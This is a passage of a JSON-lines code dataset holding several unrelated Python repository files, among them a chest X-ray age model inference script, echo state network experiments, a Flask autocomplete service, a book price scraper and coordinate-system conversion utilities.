outputs for several augmented inputs for TTA\"\r\n dl = learn.dl(ds_type)\r\n ds = dl.dataset\r\n old = ds.tfms\r\n #activ = ifnone(activ, _loss_func2activ(learn.loss_func))\r\n augm_tfm = [o for o in learn.data.train_ds.tfms if o.tfm not in\r\n (crop_pad, flip_lr, dihedral, zoom)]\r\n try:\r\n pbar = master_bar(range(8))\r\n for i in pbar:\r\n row = 1 if i&1 else 0\r\n col = 1 if i&2 else 0\r\n #flip = i&4\r\n d = {'row_pct':row, 'col_pct':col, 'is_random':False}\r\n tfm = [*augm_tfm, zoom(scale=scale, **d), crop_pad(**d)]\r\n #if flip: tfm.append(flip_lr(p=1.))\r\n #import pdb; pdb.set_trace()\r\n ds.tfms = tfm\r\n yield get_preds(learn.model, dl, pbar=pbar, activ=activ)[0]\r\n finally: ds.tfms = old\r\n\r\n\r\ndef _TTA(learn:Learner, beta:float=0.4, scale:float=1.35, ds_type:DatasetType=DatasetType.Valid, activ:nn.Module=None, with_loss:bool=False) -> Tensors:\r\n \"Applies TTA to predict on `ds_type` dataset.\"\r\n preds,y = learn.get_preds(ds_type, activ=activ)\r\n all_preds = list(_tta_only(learn,ds_type=ds_type, activ=activ, scale=scale))\r\n avg_preds = torch.stack(all_preds).mean(0)\r\n sd_preds = torch.stack(all_preds).std(0)\r\n if beta is None: return preds,avg_preds,y,sd_preds\r\n else:\r\n final_preds = preds*beta + avg_preds*(1-beta)\r\n if with_loss:\r\n with NoneReduceOnCPU(learn.loss_func) as lf: loss = lf(final_preds, y)\r\n return final_preds, y, loss,sd_preds\r\n return final_preds, y,sd_preds\r\n\r\nnum_workers = 16\r\nbs = 32\r\nif __name__ == '__main__':\r\n\r\n arguments = docopt(__doc__)\r\n ###Grab image directory\r\n image_dir = arguments['']\r\n one = False\r\n \r\n mdl_path = arguments['']\r\n size = int(arguments['--size'])\r\n ###set model architecture\r\n m = arguments['--modelarch'].lower()\r\n 
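    # Build the inference dataframe (added comment): with no --dataframe given,
    # every file in image_dir is listed and paired with a random dummy target;
    # otherwise the supplied CSV is loaded and, when --checkFiles is set, rows
    # whose image file is missing from disk are dropped (missing paths printed).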
if(arguments['--dataframe']==\"None\"):\r\n        files = [f for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir,f))] \r\n        \r\n        if(len(files)==1):\r\n            one = True\r\n            files.extend(files)\r\n\r\n        ###Results\r\n        output_df = pd.DataFrame(columns = ['File','Dummy','Prediction'])\r\n        \r\n        output_df['File'] = files\r\n        if(arguments['--type'].lower()==\"discrete\"):\r\n            output_df['Dummy'] = np.random.randint(0,2,len(files))\r\n        else:\r\n            output_df['Dummy'] = np.random.random_sample(len(files))\r\n        col = 'Dummy'\r\n    else:\r\n        output_df = pd.read_csv(arguments['--dataframe'])\r\n        locs = []\r\n        if(arguments['--checkFiles']):\r\n            for i in range(0,output_df.shape[0]):\r\n                if(os.path.exists(os.path.join(image_dir,output_df.iloc[i,0]))):\r\n                    locs.append(i)\r\n                else:\r\n                    print(output_df.iloc[i,0])\r\n            output_df = output_df.iloc[locs,:]\r\n        \r\n        output_df = output_df.reset_index(drop=True) \r\n        col = arguments['--target']\r\n    \r\n    if(arguments[\"--split\"]!=\"False\"):\r\n        output_df = output_df[output_df.Dataset==\"Te\"]\r\n    if(arguments[\"--type\"].lower()==\"continuous\"):\r\n        imgs = (ImageList.from_df(df=output_df,path=image_dir)\r\n                .split_none()\r\n                .label_from_df(cols=col,label_cls=FloatList)\r\n                .transform(tfms_test,size=size)\r\n                .databunch(num_workers = num_workers,bs=bs).normalize(imagenet_stats))\r\n    else:\r\n        imgs = (ImageList.from_df(df=output_df,path=image_dir)\r\n                .split_none()\r\n                .label_from_df(cols=col)\r\n                .transform(tfms_test,size=size)\r\n                .databunch(num_workers = num_workers,bs=bs).normalize(imagenet_stats))\r\n    \r\n    \r\n    manual = False\r\n    \r\n    #Compute # of output nodes\r\n    if(arguments['--type'].lower()==\"continuous\"):\r\n        out_nodes = 1\r\n    else:\r\n        out_nodes = 2\r\n    \r\n    \r\n    if(m==\"inceptionv4\"):\r\n        def get_model(pretrained=True, model_name = 'inceptionv4', **kwargs ): \r\n            if pretrained:\r\n                arch = pretrainedmodels.__dict__[model_name](num_classes=1000, pretrained='imagenet')\r\n            else:\r\n                arch = pretrainedmodels.__dict__[model_name](num_classes=1000, pretrained=None)\r\n            return arch\r\n\r\n        def get_cadene_model(pretrained=True, **kwargs ): \r\n            return fastai_inceptionv4\r\n        custom_head = create_head(nf=2048*2, nc=37, ps=0.75, bn_final=False) \r\n        fastai_inceptionv4 = nn.Sequential(*list(children(get_model(model_name = 'inceptionv4'))[:-2]),custom_head) \r\n\r\n    \r\n    ###Based on the input model, create a cnn learner object\r\n    \r\n    elif(m==\"resnet50\"):\r\n        mdl = fastai.vision.models.resnet50\r\n    elif(m==\"resnet34\"):\r\n        mdl = fastai.vision.models.resnet34\r\n    elif(m==\"resnet18\"):\r\n        mdl = fastai.vision.models.resnet18\r\n    elif(m==\"resnet101\"):\r\n        mdl = fastai.vision.models.resnet101\r\n    elif(m==\"resnet152\"):\r\n        mdl = fastai.vision.models.resnet152\r\n    elif(m==\"densenet121\"):\r\n        mdl = fastai.vision.models.densenet121\r\n    elif(m==\"densenet169\"):\r\n        mdl = fastai.vision.models.densenet169\r\n    elif(m==\"age\"):\r\n        mdl=fastai.vision.models.resnet34\r\n    elif(m==\"larget\"):\r\n        manual = True\r\n        mdl = SimpleArchs.get_simple_model(\"LargeT\",out_nodes)\r\n    elif(m==\"largew\"):\r\n        manual = True\r\n        mdl = SimpleArchs.get_simple_model(\"LargeW\",out_nodes)\r\n    elif(m==\"small\"):\r\n        manual = True\r\n        mdl = SimpleArchs.get_simple_model(\"Small\",out_nodes)\r\n    elif(m==\"tiny\"):\r\n        manual = True\r\n        mdl = SimpleArchs.get_simple_model(\"Tiny\",out_nodes)\r\n    else:\r\n        print(\"Sorry, model: \" + m + \" is not yet supported... 
coming soon!\")\r\n quit()\r\n \r\n \r\n \r\n if(m=='inceptionv4'):\r\n learn = cnn_learner(imgs, get_cadene_model, metrics=accuracy)\r\n elif(manual):\r\n learn = Learner(imgs,mdl)\r\n else:\r\n learn = cnn_learner(imgs, mdl, metrics=accuracy)\r\n \r\n if(m==\"age\"):\r\n numFeatures = 16\r\n learn.model[1] = nn.Sequential(*learn.model[1][:-5],nn.Linear(1024,512,bias=True),nn.ReLU(inplace=True),nn.BatchNorm1d(512),nn.Dropout(p=0.5),\r\n nn.Linear(512,numFeatures,bias=True),nn.ReLU(inplace=True),nn.BatchNorm1d(numFeatures),\r\n nn.Linear(numFeatures,1,bias=True)).cuda()\r\n \r\n\r\n N = len(image_dir.split(\"/\"))\r\n dir_fix = \"../\"*(N-1)\r\n learn.model_dir = \".\"\r\n learn.load(os.path.join(dir_fix,mdl_path))\r\n\r\n\r\n\r\n if(arguments['--type'].lower()==\"discrete\"):\r\n preds,y,sd_preds = _TTA(learn,ds_type = DatasetType.Fix,activ=nn.Softmax())\r\n \r\n ###output predictions as column with model name\r\n output_df['Prediction'] = np.array(preds[:,1])\r\n output_df['SD_Prediction'] = np.array(sd_preds[:,1])\r\n else:\r\n preds,y,sd_preds = _TTA(learn,ds_type = DatasetType.Fix)\r\n \r\n ###output predictions as column with model name\r\n output_df['Prediction'] = np.array(preds)\r\n output_df['SD_Prediction'] = np.array(sd_preds)\r\n\r\n learn.data.batch_size = 1\r\n learn.data.valid_dl = imgs.train_dl.new(shuffle=False)\r\n learn.model.eval()\r\n\r\n rc = GradCAMUtils.ResnetCAM(learn.model)\r\n count = 0\r\n #Saliency maps\r\n if(arguments['--saliency'] is not None):\r\n for i in progress_bar(learn.data.valid_dl):\r\n img = i[0]\r\n tmp = img.resize(1,3,224,224).cuda()\r\n tmp.requires_grad_()\r\n pred = rc(tmp)\r\n if(arguments['--type'].lower()==\"continuous\"):\r\n pred.backward()\r\n else:\r\n prob = F.softmax(pred,dim=1)\r\n pred[:,1].backward()\r\n saliency,_ = torch.max(tmp.grad.data.abs(),dim=1)\r\n #import pdb; pdb.set_trace()\r\n filename = output_df.iloc[count,0]\r\n\r\n img = Image.open(os.path.join(image_dir,filename)).convert('RGB')\r\n img = transforms.ToTensor()(img)\r\n new_img = rc.blendImage(saliency[0,:,:].detach().clone().cpu(),img.detach().clone(),alpha=0.5,cmap='hot')\r\n ###Because filenames include full path here\r\n if(len(filename.split(\"/\"))>1):\r\n tmp_fname = filename.split(\"/\")\r\n filename = tmp_fname[len(tmp_fname)-1]\r\n \r\n new_img.save(os.path.join(arguments['--saliency'],filename))\r\n count = count + 1\r\n if(one):\r\n output_df.drop([1])\r\n if(m==\"age\"):\r\n arr = np.array(output_df.Prediction)\r\n arr = arr * 8.03342449139388 + 63.8723890235948\r\n arr = arr * 6.75523 - 0.03771*arr*arr -213.77257 \r\n output_df['CXR_Age'] = arr\r\n output_df = output_df.drop([\"Prediction\"],axis=1)\r\n output_df = output_df.drop([\"Dummy\"],axis=1)\r\n output_df.to_csv(arguments[''])\r\n","repo_name":"circ-ml/CXR-Age","sub_path":"run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"27894886017","text":"from exputils import *\nimport time\nimport pandas as pd\nimport numpy as np\nimport Oger\nimport pylab\nimport mdp\n\ndef DoESN(data, n_test, config):\n try:\n n_in, n_out, res_size, s_radius, leak_rate = config\n sData, ma, mi, me = scale(data)\n \n supData = series_to_supervised(sData, n_in, n_out)\n train,test = train_test_split(supData, n_test)\n train_x, train_y = [np.array(train[:, :n_in])], [np.array(train[:, n_in:])]\n test_x, test_y = [np.array(test[:, :n_in])], [np.array(test[:, n_in:])]\n reservoir = 
Oger.nodes.LeakyReservoirNode(input_dim=n_in, \n output_dim=res_size, \n spectral_radius=s_radius,\n leak_rate=leak_rate)\n readout = Oger.nodes.RidgeRegressionNode()\n flow = mdp.Flow([reservoir, readout], verbose=1)\n data = [None, zip(train_x,train_y)]\n\n blockPrint()\n t0=time.time()\n flow.train(data)\n train_time = time.time() - t0\n \n t0=time.time()\n y_hat = flow(test_x)\n predi_time = time.time() - t0\n enablePrint()\n\n p_data = unscaleOger(y_hat, ma, mi, me)\n\n rmse = Oger.utils.rmse(unscaleOger(test_y[0], ma, mi, me), p_data)\n\n return rmse, train_time, predi_time, p_data.flatten()\n\n except:\n return None\n\ndef GetConfigsESN():\n n_ins = [5, 10, 20]\n n_outs = [1]\n res_sizes = [50, 100, 200, 400, 600, 1000]\n n_leaking_rate = [0.1, 0.2, 0.3, 0.5, 0.8]\n spectral_rads = [0.1, 0.3, 0.5, 0.7, 0.9]\n # create configs\n configs = list()\n for i in n_ins:\n for j in n_outs:\n for k in res_sizes:\n for l in n_leaking_rate:\n for m in spectral_rads:\n cfg = [i, j, k, l, m]\n configs.append(cfg)\n print('Total configs: %d' % len(configs))\n return configs, ['n_ins', 'n_outs', 'res_sizes', 'n_leaking_rate', 'spectral_rads']\n\nconfigs, configNames = GetConfigsESN()\nRunExp('esn', DoESN, configs, configNames)","repo_name":"oadele3/traffic_prediction","sub_path":"esn.py","file_name":"esn.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17830525476","text":"import time\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom lib.Suggester import Suggester\n\napp = Flask(__name__)\n\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\nsuggester = Suggester()\n\n\n@app.route(\"/\")\ndef suggest():\n user_input = request.args.get('q')\n response = {\n \"error\": \"Parameter missing\",\n \"message\": \"You've not added required query parameter *q* with the word\",\n \"allowed_params\": {\n \"q\": {\n \"type\": \"required\",\n \"value\": \"string\",\n \"desc\": \"word to auto complete\"\n },\n \"n\": {\n \"type\": \"optional\",\n \"value\": \"positive integer\",\n \"desc\": \"number of auto complete suggestions to return\"\n }\n }\n }\n if user_input:\n try:\n start = time.time()\n num_words = int(request.args.get('n')) if request.args.get('n') else 25\n response = suggester.suggest_for(user_input, num_words)\n end = time.time()\n time_taken = (end - start) * 1000\n return jsonify({'time_taken': str(round(time_taken, 2)) + 'ms', 'total': len(response), 'suggestions': response}), 200\n except ValueError:\n return jsonify({\"error\": \"Input is invalid\"}), 422\n else:\n return jsonify(response), 400\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"apoorvparijat/airbase-autocomplete","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34736454653","text":"import pandas as pd\nimport requests\n\n\nclass DataFetcher:\n def get_symbol_OHLC_data(\n self, \n data_provider_settings, \n filename, \n asset_symbol,\n source\n ):\n full_filename = asset_symbol + \"_\" + filename\n api_response = None\n \n if source == \"alpha_vantage_api\":\n api_response = 
requests.get(f'{data_provider_settings[\"ALPHA_VANTAGE_API_URL\"]}{data_provider_settings[\"ALPHA_VANTAGE_FUNCTION\"]}&symbol={asset_symbol}&apikey={data_provider_settings[\"ALPHA_VANTAGE_API_KEY\"]}&outputsize={data_provider_settings[\"ALPHA_VANTAGE_TIME_SERIES_LENGTH\"]}&datatype=csv')\n if source == \"internal_web_scraping_service\":\n api_response = requests.get(f'http://localhost:2000/getSymbolOHLCTimeSeries/{asset_symbol}') \n data_file = open(full_filename, 'wb')\n data_file.write(api_response.content)\n \n\n df = pd.read_csv(\n full_filename, \n sep = ',',\n parse_dates = [\"timestamp\"]\n )\n df = df.dropna(subset = [\"timestamp\"])\n pd.to_datetime(df[\"timestamp\"])\n return df\n\n\n def get_period_of_time_series(\n self, \n data, \n start_date, \n end_date\n ):\n data_after_start_date = data[data[\"timestamp\"] > pd.Timestamp(start_date)]\n data_until_end_date = data_after_start_date[data_after_start_date[\"timestamp\"] < pd.Timestamp(end_date)]\n return data_until_end_date.drop_duplicates()","repo_name":"asparuhkostov/algo-trading-workbench","sub_path":"backtesting/strategizer/DataFetcher.py","file_name":"DataFetcher.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18885990020","text":"__author__ = 'zhwang.kevin'\nimport os, sys\nimport http.client, urllib, urllib.request\n\n\ndef encode_multipart_formdata(fields):\n '''''\n 该函数用于拼接multipart/form-data类型的http请求中body部分的内容\n 返回拼接好的body内容及Content-Type的头定义\n '''\n import random\n import os\n\n BOUNDARY = '----------%s' % ''.join(random.sample('0123456789abcdef', 15))\n CRLF = b'\\r\\n'\n L = []\n for key, value in fields.items():\n if (type(value) == type(['abc', 'der'])):\n pass\n else:\n value = [value]\n for item in value:\n filepath = isfiledata(item)\n if filepath:\n L.append(('--' + BOUNDARY).encode('UTF8'))\n L.append(('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (\n key, os.path.basename(filepath))).encode('UTF8'))\n L.append(('Content-Type: %s' % get_content_type(filepath)).encode('UTF8'))\n L.append(''.encode('UTF8'))\n L.append(ReadFileAsContent(filepath))\n else:\n L.append(('--' + BOUNDARY).encode('UTF8'))\n L.append(('Content-Disposition: form-data; name=\"%s\"' % key).encode('UTF8'))\n L.append(''.encode('UTF8'))\n L.append(item.encode('UTF8'))\n L.append(('--' + BOUNDARY + '--').encode('UTF8'))\n L.append(''.encode('UTF8'))\n\n # for abcd in L:\n # body=body+abcd+CRLF\n\n body = CRLF.join(L)\n content_type = 'multipart/form-data; boundary=%s' % BOUNDARY\n return content_type, body\n\n\ndef encode_multipart_formdata_onefile(fields):\n '''''\n 该函数用于拼接multipart/form-data类型的http请求中body部分的内容\n 返回拼接好的body内容及Content-Type的头定义\n '''\n import random\n import os\n\n BOUNDARY = '----------%s' % ''.join(random.sample('0123456789abcdef', 15))\n CRLF = b'\\r\\n'\n L = []\n for key, value in fields.items():\n if (type(value) == type(['abc', 'der'])):\n pass\n else:\n value = [value]\n for item in value:\n L.append(('--' + BOUNDARY).encode('UTF8'))\n L.append(\n ('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (key, 'spots.jpg')).encode(\n 'UTF8'))\n L.append(('Content-Type: image/jpeg' ).encode('UTF8'))\n L.append(''.encode('UTF8'))\n L.append(item)\n\n L.append(('--' + BOUNDARY + '--').encode('UTF8'))\n L.append(''.encode('UTF8'))\n\n # for abcd in L:\n # body=body+abcd+CRLF\n\n body = CRLF.join(L)\n content_type = 'multipart/form-data; boundary=%s' % BOUNDARY\n return content_type, 
body\n\n\ndef get_content_type(filename):\n import mimetypes\n\n return mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n\n\ndef isfiledata(p_str):\n # import re\n rert = os.path.exists(p_str)\n # r_c = re.compile(\"^f'(.*)'$\")\n # rert = r_c.search(str(p_str))\n # rert = re.search(\"^f'(.*)'$\", p_str)\n if rert:\n return p_str\n else:\n return None\n\n\ndef ReadFileAsContent(filename):\n # print filename\n try:\n with open(filename, 'rb') as f:\n filecontent = f.read()\n except Exception as e:\n print('The Error Message in ReadFileAsContent(): ' + e.message)\n return ''\n return filecontent\n\n\ndef gethttp(host, port, url):\n httpClient = None\n try:\n httpClient = http.client.HTTPConnection(host, port, timeout=300)\n httpClient.request('GET', url, None, {'Content-Type': 'text/html; charset=utf-8'})\n # response是HTTPResponse对象\n response = httpClient.getresponse()\n # print(response.status)\n # print(response.reason)\n # #此处很重要,decode必不可少\n strrespose = response.read().decode('utf-8')\n # print(strrespose)\n return strrespose\n except Exception as e:\n print(e)\n finally:\n if httpClient:\n httpClient.close()\n\n\ndef posthttp(form, url):\n httpClient = None\n\n try:\n contenttype, body = encode_multipart_formdata(form)\n headers = {\"Content-type\": contenttype,\n \"Accept\": \"application/json;charset=UTF-8\"}\n req = urllib.request.Request(url=url, data=body, headers=headers)\n # print(req)\n res_data = urllib.request.urlopen(req)\n jsonstr = res_data.read().decode('utf-8')\n # print(jsonstr)\n # print(res_data.status)\n # print(res_data.reason)\n # print(res_data.getheaders()) # 获取头信息\n return jsonstr\n except Exception as e:\n print(e)\n\n finally:\n if httpClient:\n httpClient.close()\n\ndef posthttp_onefile(form, url):\n httpClient = None\n\n try:\n contenttype, body = encode_multipart_formdata_onefile(form)\n headers = {\"Content-type\": contenttype,\n \"Accept\": \"application/json;charset=UTF-8\"}\n req = urllib.request.Request(url=url, data=body, headers=headers)\n res_data = urllib.request.urlopen(req)\n jsonstr = res_data.read().decode('utf-8')\n return jsonstr\n except Exception as e:\n print(e)\n finally:\n if httpClient:\n httpClient.close()\n","repo_name":"coolcoldboy/PythonSub","sub_path":"PostGetHttp.py","file_name":"PostGetHttp.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38997395650","text":"import sys\nfrom collections import Counter\n\ninput = sys.stdin.readline\n\nN, M, B = map(int, input().split())\nC = Counter()\nfor _ in range(N):\n C += Counter(map(int, input().split()))\nT, H = sys.maxsize, 0\nkeys = list(C.keys())\n\nfor h in range(257):\n t = 0\n op1, op2 = 0, 0\n\n for k in keys:\n if k < h:\n op2 += C[k] * (h-k)\n elif k > h:\n op1 += C[k] * (k-h)\n\n if op2 > op1 + B:\n continue\n else:\n t = op1 * 2 + op2\n\n if t < T:\n T, H = t, h\n elif t == T and h > H:\n H = h\n\nprint(T, H)\n","repo_name":"minyeamer/til","sub_path":"algorithm/baekjoon/02-silver/n18111.py","file_name":"n18111.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13266294805","text":"from typing import NamedTuple\nimport requests\nfrom lxml import html\n\n\nclass BookObject(NamedTuple):\n title: str\n price: float\n link: str\n store: str\n\n def __str__(self):\n return '价格: {self.price}, 名称: {self.title}, 链接:{self.link}, 
店铺:{self.store}'.format(self=self)\n\n\nclass Spider_Book(object):\n def __init__(self, sn):\n self.sn = sn\n self.book_list = []\n\n def spider_dangdang(self):\n self.dd_url = 'http://search.dangdang.com/?key={isbn}&act=input'.format(isbn = self.sn)\n # 获取html文本\n respones = requests.get(self.dd_url)\n html_str = respones.text\n # 使用lxml获取html元素对象\n selector = html.fromstring(html_str)\n # 对象调用xpath()获取标签内容\n ul_list = selector.xpath('//div[@id=\"search_nature_rg\"]/ul/li')\n for li in ul_list:\n # 获取名字\n title = li.xpath('p[@class=\"name\"]/a/@title')\n # 获取链接\n link = li.xpath('p[@class=\"name\"]/a/@href')\n # 获取价格\n now_price = li.xpath('p[@class=\"price\"]/span[@class=\"search_now_price\"]/text()')\n if len(now_price) == 0:\n now_price_bug = li.xpath('div[@class=\"ebook_buy\"]/p/span[@class=\"search_now_price\"]/text()')\n now_price = now_price_bug\n # 获取店铺\n store = li.xpath('p[@class=\"search_shangjia\"]/a[@name=\"itemlist-shop-name\"]/text()')\n if store == []:\n store.append('当当自营')\n book = BookObject(\n title= title[0],\n price= now_price[0].replace('¥', ''),\n link= link[0],\n store= store[0]\n )\n self.book_list.append(book)\n def spider_jd(self):\n self.jd_url = 'https://search.jd.com/Search?keyword={isbn}&enc=utf-8'.format(isbn = self.sn)\n # 获取html文本\n respones = requests.get(self.jd_url)\n respones.encoding = 'utf-8'\n html_str = respones.text\n # 使用lxml获取html元素对象\n selector = html.fromstring(html_str)\n # 对象调用xpath()获取标签内容\n ul_list = selector.xpath('//div[@id=\"J_goodsList\"]/ul/li')\n # print(len(ul_list))\n for li in ul_list:\n # 获取名字\n title = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-name\"]/a/em/text()')\n # 获取链接\n link = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-name\"]/a/@href')\n link[0] = 'http:{0}'.format(link[0])\n # 获取价格\n now_price = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-price\"]/strong/i/text()')\n # 获取店铺\n store = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-shopnum\"]/a/text()')\n if store == []:\n store.append('京东自营')\n book = BookObject(\n title=title[0],\n price=now_price[0].replace('¥', ''),\n link=link[0],\n store=store[0]\n )\n self.book_list.append(book)\n def spider_yhd(self):\n self.yhd_url = 'https://search.yhd.com/c0-0/k{isbn}/'.format(isbn = self.sn)\n # 获取html文本\n respones = requests.get(self.yhd_url)\n html_str = respones.text\n # 使用lxml获取html元素对象\n selector = html.fromstring(html_str)\n # 对象调用xpath()获取标签内容\n ul_list = selector.xpath('//div[@id=\"itemSearchList\"]/div')\n for li in ul_list:\n # 获取名字\n title = li.xpath('div/p[@class=\"proName clearfix\"]/a/@title')\n # 获取链接\n link = li.xpath('div/p[@class=\"proName clearfix\"]/a/@href')\n link[0] = 'http:{0}'.format(link[0])\n # 获取价格\n now_price = li.xpath('div/p[@class=\"proPrice\"]/em/@yhdprice')\n # 获取店铺\n store = li.xpath('div/p[@class=\"storeName limit_width\"]/a/text()')\n if store == []:\n store.append('1号店自营')\n else:\n store[0] = store[0].replace('\\n', '')\n book = BookObject(\n title=title[0],\n price=now_price[0].replace('¥', ''),\n link=link[0],\n store=store[0]\n )\n self.book_list.append(book)\n def sorted_price(self):\n self.spider_dangdang()\n self.spider_jd()\n self.spider_yhd()\n sorted_book_list = sorted(self.book_list, key=lambda item: float(item.price), reverse=True)\n print('>>>>>>>>>', len(sorted_book_list))\n for book in sorted_book_list:\n print(book)\n\n\nif __name__ == '__main__':\n # 9787115428028\n ISBN = input(\"请输入要查找图书的ISBN编码:\")\n rest = Spider_Book(ISBN)\n 
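    # sorted_price() (added comment) crawls Dangdang, JD and Yhd in turn and
    # prints the offers ordered by price, highest first; to query one store
    # only you could call, e.g., rest.spider_jd() and read rest.book_list.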
rest.sorted_price()","repo_name":"JIANJIE97/study","sub_path":"spider_book/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73086871082","text":"import datetime\nimport re\n\nfrom common.scripts import utils\n\n\ndef clean_date(raw_input): # noqa: C901\n if not isinstance(raw_input, str):\n raw_input = str(raw_input)\n if utils.is_empty(raw_input):\n return \"\"\n\n date = None\n\n # Correct format\n try: # nosec\n pattern = re.compile(\n r\"([0-9]([0-9]([0-9][1-9]|[1-9]0)|[1-9]00)|[1-9]000)\"\n r\"(-(0[1-9]|1[0-2])(-(0[1-9]|[1-2][0-9]|3[0-1])(T([01][0-9]|2[0-3])\"\n r\":[0-5][0-9]:([0-5][0-9]|60)(\\.[0-9]+)?(Z|(\\+|-)((0[0-9]|1[0-3]):\"\n r\"[0-5][0-9]|14:00)))?)?)?\"\n )\n full_match = re.fullmatch(raw_input, pattern)\n date = datetime.datetime.strptime(full_match.group(0)[0:10], \"%Y-%m-%d\")\n except Exception:\n pass\n\n formats = [\n \"%Y%m%d%H%M\",\n \"%Y-%m-%d %H:%M:%S\",\n \"%Y-%m-%dT%H:%M:%S\",\n \"%Y-%m-%dT%H:%M:%S%z\",\n \"%a, %d %b %Y %H:%M:%S %Z\",\n \"%Y-%m-%d\",\n \"%Y%m%d\",\n \"%Y-%m\",\n \"%Y%m\",\n \"%Y\",\n ]\n for fmt in formats:\n try:\n date = datetime.datetime.strptime(raw_input, fmt)\n except ValueError:\n continue\n\n if date is None:\n return raw_input\n\n # We only want the date\n return date.isoformat().split(\"T\")[0]\n","repo_name":"arkhn/fhir-river","sub_path":"django/common/scripts/cleaning/clean_date.py","file_name":"clean_date.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"19"} +{"seq_id":"236171690","text":"data1 = [\"place1\",\"Northern Utah\",\"Sports\",5,1,1]\r\ndata2 = [\"place2\",\"Western Utah\",\"Food\",6,1,1]\r\ndata3 = [\"place3\",\"Salt Lake Area\",\"Nature / Outdoor\",7,1,1]\r\ndata4 = [\"place4\",\"Southwestern\",\"Cultural / Historical\",5,1,4]\r\ndata5 = [\"place5\",\"Northern Utah\",\"Entertainment\",5,1,4]\r\ndata6 = [\"place6\",\"Northern Utah\",\"Sports\",5,2,4]\r\n\r\nallAttractions = [data1, data2, data3, data4, data5, data6]\r\nchosenAttractions = []\r\n\r\n\r\n#old format:\r\n#[\"name\", visitors, rating, price, type, safety]\r\n","repo_name":"thomaslu678/PythonGUI","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31537162232","text":"# encoding: utf-8\r\nfrom __future__ import absolute_import, unicode_literals, division\r\n\r\nimport math\r\n\r\n\r\nclass CoordConvert(object):\r\n X_PI = math.pi * 3000 / 180\r\n A = 6378245\r\n EE = 0.00669342162296594323\r\n\r\n @classmethod\r\n def gcj02_to_bd09(cls, longitude, latitude):\r\n \"\"\"\r\n GCJ02(火星坐标系)转BD09(百度坐标系)\r\n\r\n :param longitude: GCJ02经度\r\n :param latitude: GCJ02纬度\r\n :return: BD09经度,BD09纬度\r\n \"\"\"\r\n z = math.sqrt(longitude * longitude + latitude * latitude) + 0.00002 * math.sin(latitude * cls.X_PI)\r\n theta = math.atan2(latitude, longitude) + 0.000003 * math.cos(longitude * cls.X_PI)\r\n longitude = z * math.cos(theta) + 0.0065\r\n latitude = z * math.sin(theta) + 0.006\r\n return longitude, latitude\r\n\r\n @classmethod\r\n def bd09_to_gcj02(cls, longitude, latitude):\r\n \"\"\"\r\n BD-09(百度坐标系)转GCJ02(火星坐标系)\r\n\r\n :param longitude: BD09经度\r\n :param latitude: BD09纬度\r\n :return: GCJ02经度, GCJ02纬度\r\n \"\"\"\r\n x = longitude - 0.0065\r\n y = latitude - 0.006\r\n z = math.sqrt(x * x + y * y) - 
0.00002 * math.sin(y * cls.X_PI)\r\n        theta = math.atan2(y, x) - 0.000003 * math.cos(x * cls.X_PI)\r\n        longitude = z * math.cos(theta)\r\n        latitude = z * math.sin(theta)\r\n        return longitude, latitude\r\n\r\n    @classmethod\r\n    def wgs84_to_gcj02(cls, longitude, latitude):\r\n        \"\"\"\r\n        WGS84转GCJ02(火星坐标系)\r\n\r\n        :param longitude: WGS84经度\r\n        :param latitude: WGS84纬度\r\n        :return: GCJ02经度, GCJ02纬度\r\n        \"\"\"\r\n        if not cls.in_china(longitude, latitude):\r\n            return longitude, latitude\r\n        longitude_add, latitude_add = cls._transform(longitude - 105, latitude - 35)\r\n\r\n        rad_latitude = latitude / 180 * math.pi\r\n        magic = math.sin(rad_latitude)\r\n        magic = 1 - cls.EE * magic * magic\r\n        sqrt_magic = math.sqrt(magic)\r\n        latitude_add = (latitude_add * 180) / ((cls.A * (1 - cls.EE)) / (magic * sqrt_magic) * math.pi)\r\n        longitude_add = (longitude_add * 180) / (cls.A / sqrt_magic * math.cos(rad_latitude) * math.pi)\r\n        latitude += latitude_add\r\n        longitude += longitude_add\r\n        return longitude, latitude\r\n\r\n    @classmethod\r\n    def wgs84_to_bd09(cls, longitude, latitude):\r\n        \"\"\"\r\n        WGS84转BD09(百度坐标系)\r\n\r\n        :param longitude: WGS84经度\r\n        :param latitude: WGS84纬度\r\n        :return: BD09经度,BD09纬度\r\n        \"\"\"\r\n        longitude, latitude = cls.wgs84_to_gcj02(longitude, latitude)\r\n        return cls.gcj02_to_bd09(longitude, latitude)\r\n\r\n    @classmethod\r\n    def _transform(cls, x, y):\r\n        sqrt_x = math.sqrt(math.fabs(x))\r\n        x_add = 300 + 1 * x + 2 * y + 0.1 * x * x + 0.1 * x * y + 0.1 * 